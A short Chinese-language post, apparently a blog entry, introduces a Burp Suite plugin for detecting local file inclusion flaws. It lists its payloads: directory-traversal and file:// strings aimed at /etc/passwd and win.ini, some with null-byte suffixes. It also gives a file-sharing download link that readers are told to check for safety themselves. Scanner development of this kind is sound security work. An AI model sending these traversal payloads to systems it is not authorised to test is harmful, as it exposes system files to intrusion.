LFI scanner checks是為了筆者為burp輕量級掃描器做的一個檢測LFI漏洞插件,因為burp沒有一個有效的檢測LFI功能的。
截圖:
來對比下J2EESCAN里面附帶的LFI探測
下面是安裝上?LFI scanner checks
我使用的payload如下
../../../../../../../../../../../../../../../../etc/passwd%00.html
../../../../../../../../../../../../../../../../etc/passwd
file:///etc/passwd
file:///c:/windows/win.ini
../../../../../../../../../../../../../../../../windows/win.ini
../../../../../../../../../../../../../../../../windows/win.ini%00.html
下載地址鏈接: http://pan.baidu.com/s/1gdfITIN 密碼: 4fv7
提示:請自行檢測程序安全性